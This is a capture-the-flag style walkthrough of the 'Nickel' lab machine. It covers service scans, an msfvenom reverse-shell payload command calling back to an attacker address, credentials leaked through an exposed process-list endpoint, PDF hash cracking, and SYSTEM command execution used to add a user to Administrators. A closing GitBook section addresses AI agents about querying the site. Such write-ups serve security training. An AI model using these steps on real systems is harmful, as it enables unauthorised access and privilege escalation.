> For the complete documentation index, see [llms.txt](https://pentesting.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.zeyu2001.com/proving-grounds/get-to-work/nickel.md). # Nickel ## Information Gathering ### Service Enumeration `nmapAutomator.sh -H 192.168.90.99 -t full` `nmapAutomator.sh -H 192.168.90.99 -t vulns` ![](/files/-Madc9yBhBUXjngbfuWQ) ### SMB (139) ![](/files/-MadcCdnJ2Tdv72s319q) `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python` ### HTTP On port 8089, we have a dashboard: ![](/files/-MadcG24-jf27BIrOFQ5) Each of the links bring us to 169.254.109.39:33333. By going to 192.168.90.99:33333 instead, we get a Not Found response for `/list-current-deployments`. ![](/files/-MadcIjCMFd_4CHnHxkV) We get a different message, however, for `/list-running-procs`. ![](/files/-MadcLDizjz-8OVQZ--g) If we send a POST request instead, we indeed see a list of running processes! ![](/files/-MadcNzZ2sGBG42VwDgl) In the command line of one of the processes, we get a user's credentials. ![](/files/-MadcRXrAms03CEPU5E2) Plugging the `-p` parameter into CyberChef, we can see that it is a Base 64 encoded password (`NowiseSloopTheory139`) ![](/files/-MadcdpGKznO8df7REyT) Using the credentials `ariah:NowiseSloopTheory139`, we can SSH into the server. ![](/files/-Madch-rRynNWf0WllFA) ![](/files/-MadcjyL3e0d8NQGSs-G) ## Privilege Escalation Using previously found credentials for `ariah`, we can access the FTP service and download a PDF file. ![](/files/-MadcmxlNY5XHeNWPUXD) However, a password is required. The previously found password does not work. ![](/files/-MadcusSzyGqmXlTzxho) Use `pdf2john.pl` to extract the hash. `perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt` Use John the Ripper to crack the hash. `john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt` ![](/files/-Madd2d3-dAp4dFUQAu5) The password is `ariah4168`. Here, we find a 'Temporary Command endpoint' at `http://nickel/` that is only accessible through the remote machine. ![](/files/-MaddNfwv6V0xyZ6_Cp8) Using Powershell, we can send a GET request to the API endpoint. `$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing` This executes `whoami`, and we can see the output below. ![](/files/-MaddeooDXYRfVag101z) We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing - adding ourselves to the `Administrators` group. `localgroup Administrators ariah /add` ![](/files/-Maddi-WO9AwVUhIlUY3) If we check the Administrators group again (`net localgroup Administrators`), we can see that our user `ariah` was added. ![](/files/-Madf3eW89-4k9VCyTkd) Now, we can RDP into the machine and run the command prompt as Administrator. ![](/files/-MadfTe8Yr3A1hWHFp7y) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://pentesting.zeyu2001.com/proving-grounds/get-to-work/nickel.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.